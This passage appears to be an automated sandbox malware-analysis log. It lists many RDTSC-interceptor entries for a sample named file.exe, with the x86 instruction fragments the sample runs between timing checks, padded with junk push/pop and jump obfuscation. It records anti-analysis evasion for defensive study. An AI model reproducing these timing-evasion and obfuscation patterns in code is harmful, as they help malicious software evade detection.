00007FB7D509B84Bh 0x00000058 popad 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jne 00007FB7D509B85Dh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10902 second address: A10929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FB7D50A5ED6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10929 second address: A1093B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB7D509B846h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F75 second address: A11F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F7B second address: A11F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F89 second address: A11F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F8D second address: A11F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F93 second address: A11FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB7D50A5EE8h 0x00000008 jmp 00007FB7D50A5EE5h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B00D2 second address: 50B00DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 880Eh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B00DB second address: 50B016D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB7D50A5EDEh 0x00000011 xor eax, 56A5E688h 0x00000017 jmp 00007FB7D50A5EDBh 0x0000001c popfd 0x0000001d mov dx, cx 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 call 00007FB7D50A5EDBh 0x00000028 pushfd 0x00000029 jmp 00007FB7D50A5EE8h 0x0000002e jmp 00007FB7D50A5EE5h 0x00000033 popfd 0x00000034 pop ecx 0x00000035 movsx edx, ax 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB7D50A5EDFh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B016D second address: 50B01CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B855h 0x0000000b sub cx, 9F16h 0x00000010 jmp 00007FB7D509B851h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FB7D509B84Eh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB7D509B857h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0011 second address: 50A0015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0015 second address: 50A001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0172 second address: 50E0178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507011E second address: 5070147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB7D509B854h 0x0000000a sub ah, 00000058h 0x0000000d jmp 00007FB7D509B84Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070147 second address: 507014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507014C second address: 5070165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB7D509B84Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070165 second address: 507018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, AE64h 0x00000007 mov di, 4CD0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB7D50A5EE1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507018B second address: 5070191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090BCD second address: 5090C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F99Ah 0x00000007 mov ch, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FB7D50A5EDAh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FB7D50A5EDCh 0x0000001c adc esi, 4DA20D08h 0x00000022 jmp 00007FB7D50A5EDBh 0x00000027 popfd 0x00000028 mov cx, 777Fh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090C0C second address: 5090C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bh 0x00000005 mov eax, 78817413h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 call 00007FB7D509B850h 0x00000017 jmp 00007FB7D509B852h 0x0000001c pop eax 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push esi 0x00000024 pop edx 0x00000025 push esi 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090C4C second address: 5090CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D50A5EE1h 0x00000009 sub esi, 299DDAE6h 0x0000000f jmp 00007FB7D50A5EE1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB7D50A5EE0h 0x0000001b xor si, B688h 0x00000020 jmp 00007FB7D50A5EDBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FB7D50A5EE5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50907B6 second address: 50907BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50907BB second address: 509082B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d pushfd 0x0000000e jmp 00007FB7D50A5EE8h 0x00000013 and cx, AA78h 0x00000018 jmp 00007FB7D50A5EDBh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov dx, cx 0x00000026 pushfd 0x00000027 jmp 00007FB7D50A5EDEh 0x0000002c adc cx, C4D8h 0x00000031 jmp 00007FB7D50A5EDBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 509082B second address: 50908B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e pushfd 0x0000000f jmp 00007FB7D509B859h 0x00000014 sbb si, 75D6h 0x00000019 jmp 00007FB7D509B851h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FB7D509B84Ch 0x00000029 adc cl, FFFFFFF8h 0x0000002c jmp 00007FB7D509B84Bh 0x00000031 popfd 0x00000032 mov ch, 85h 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FB7D509B84Dh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50908B3 second address: 50908B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50908B7 second address: 50908BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 509070E second address: 509076F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D50A5EDFh 0x00000009 adc al, FFFFFFFEh 0x0000000c jmp 00007FB7D50A5EE9h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f pushfd 0x00000020 jmp 00007FB7D50A5EE0h 0x00000025 and ecx, 7744B828h 0x0000002b jmp 00007FB7D50A5EDBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50903C9 second address: 50903E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B859h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50903E6 second address: 509041F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB7D50A5EE1h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EDDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A02EB second address: 50A030C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB7D509B858h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A030C second address: 50A0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB7D50A5EE1h 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e push ecx 0x0000000f mov edx, 3D5DAF0Eh 0x00000014 pop edi 0x00000015 pushfd 0x00000016 jmp 00007FB7D50A5EE4h 0x0000001b xor ah, 00000058h 0x0000001e jmp 00007FB7D50A5EDBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB7D50A5EE0h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0368 second address: 50A036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A036C second address: 50A0372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0372 second address: 50A03A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ecx, 65EB0EE7h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FB7D509B84Ah 0x00000018 or ax, 6B18h 0x0000001d jmp 00007FB7D509B84Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0008 second address: 50E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E000C second address: 50E0029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0029 second address: 50E002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E002F second address: 50E0033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0033 second address: 50E006C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB7D50A5EE1h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov bx, 67C2h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0453 second address: 50B0477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0477 second address: 50B047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B047B second address: 50B0481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0481 second address: 50B0487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0487 second address: 50B04FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, 73D4h 0x00000011 mov dl, F9h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a pushfd 0x0000001b jmp 00007FB7D509B84Dh 0x00000020 and ch, 00000046h 0x00000023 jmp 00007FB7D509B851h 0x00000028 popfd 0x00000029 popad 0x0000002a pushfd 0x0000002b jmp 00007FB7D509B850h 0x00000030 add ecx, 2DC6C1E8h 0x00000036 jmp 00007FB7D509B84Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push edi 0x00000043 pop ecx 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B04FA second address: 50B053D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB7D50A5EE3h 0x00000015 popad 0x00000016 and dword ptr [eax], 00000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB7D50A5EE5h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B053D second address: 50B058A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B857h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax+04h], 00000000h 0x0000000f jmp 00007FB7D509B852h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB7D509B857h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B058A second address: 50B0590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0590 second address: 50B0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 509056D second address: 5090573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090573 second address: 5090577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090577 second address: 50905B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov al, dh 0x00000013 pushfd 0x00000014 jmp 00007FB7D50A5EDCh 0x00000019 xor ah, 00000008h 0x0000001c jmp 00007FB7D50A5EDBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50905B5 second address: 5090640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D509B84Fh 0x00000009 sbb ecx, 0968564Eh 0x0000000f jmp 00007FB7D509B859h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FB7D509B84Fh 0x00000025 and ch, 0000005Eh 0x00000028 jmp 00007FB7D509B859h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FB7D509B850h 0x00000034 xor al, 00000058h 0x00000037 jmp 00007FB7D509B84Bh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0008 second address: 50B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B000C second address: 50B0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0010 second address: 50B0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B02C2 second address: 50B02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov di, EA16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB7D509B859h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B02EB second address: 50B02F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B02F1 second address: 50B02F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0641 second address: 50D0645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0645 second address: 50D064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D064B second address: 50D0684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB7D50A5EDBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EE0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0684 second address: 50D0688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0688 second address: 50D068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D068E second address: 50D06C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, si 0x0000000f mov ch, 1Eh 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 577BCD42h 0x0000001b call 00007FB7D509B853h 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D06C7 second address: 50D06FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov al, bl 0x0000000f popad 0x00000010 mov eax, dword ptr [76FB65FCh] 0x00000015 pushad 0x00000016 push edx 0x00000017 mov edi, eax 0x00000019 pop esi 0x0000001a popad 0x0000001b test eax, eax 0x0000001d pushad 0x0000001e push edi 0x0000001f mov edi, eax 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ax, dx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D06FF second address: 50D0742 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB7D509B84Fh 0x00000008 sub al, FFFFFFAEh 0x0000000b jmp 00007FB7D509B859h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 je 00007FB846EFEA7Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edi, 580C110Eh 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0742 second address: 50D0748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0748 second address: 50D07C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB7D509B84Eh 0x00000014 sbb ax, A788h 0x00000019 jmp 00007FB7D509B84Bh 0x0000001e popfd 0x0000001f mov ebx, ecx 0x00000021 popad 0x00000022 xor eax, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 mov ax, bx 0x00000029 pushfd 0x0000002a jmp 00007FB7D509B84Dh 0x0000002f xor eax, 4C1C36A6h 0x00000035 jmp 00007FB7D509B851h 0x0000003a popfd 0x0000003b popad 0x0000003c and ecx, 1Fh 0x0000003f pushad 0x00000040 mov dl, ah 0x00000042 pushad 0x00000043 mov si, di 0x00000046 mov si, di 0x00000049 popad 0x0000004a popad 0x0000004b ror eax, cl 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D07C5 second address: 50D07DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D07DB second address: 50D0828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B857h 0x0000000b sub cl, FFFFFFEEh 0x0000000e jmp 00007FB7D509B859h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 leave 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB7D509B84Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0828 second address: 50D0838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0838 second address: 50D087E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00762014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FB7D9A4BFC9h 0x00000023 push FFFFFFFEh 0x00000025 jmp 00007FB7D509B857h 0x0000002a pop eax 0x0000002b jmp 00007FB7D509B856h 0x00000030 ret 0x00000031 nop 0x00000032 push eax 0x00000033 call 00007FB7D9A4BFF3h 0x00000038 mov edi, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push ebx 0x0000003e pop eax 0x0000003f pushad 